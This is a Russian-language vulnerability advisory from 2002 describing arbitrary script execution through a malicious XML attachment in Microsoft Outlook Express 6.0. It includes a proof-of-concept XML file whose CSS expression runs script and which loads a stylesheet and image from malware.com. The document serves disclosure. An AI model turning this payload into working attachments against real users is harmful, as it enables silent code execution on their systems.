Выполнение произвольного кода сценария в Microsoft Outlook Express 6.0

Дата публикации:
05.08.2002
Всего просмотров:
780
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Обнаруженная уязвимость в Microsoft Outlook Express позволяет злонамеренному XML вложению выполнять произвольный код в контексте местной системы безопасности. Код будет выполнен при открытии вложения без всякого предупреждения.

Уязвимость связанна с неправильной обработкой кода сценария включенного в XSL style, внедренного в XML документ. Обычно, информации XSL стиля не разрешается выполнение XML сценариев в пределах ограниченной зоны безопасности. Однако код сценария может быть выполнен, если он может определить местоположение каталога Temporary Internet File (TIF), который в свою очередь позволяет выполнение произвольного кода в пределах Local System security zone. Пример:

<?xml version="1.0" ?> 
<?xml-stylesheet type="text/css" 
href="http://www.malware.com/malware.css" ?> 
<malware> 

<h4 style="position: absolute;top:39;left:expression(alert 
(document.location));font-family:arial;font-size:12pt;BACKGROUND- 
IMAGE:url('http://www.malware.com/youlickit.gif');background- 
repeat:no-repeat;background-position: 100 30;z-index:- 
100;height:200pt;width:400pt;font-family:Verdana;color:red">sure it 
can, malware says so</h4> 
</malware>
Уязвимость обнаружена в Microsoft Outlook Express 6.0

Ссылки: WHERE'S THE CA$H: Internet Explorer 6.00. Outlook Express 6.00
или введите имя

CAPTCHA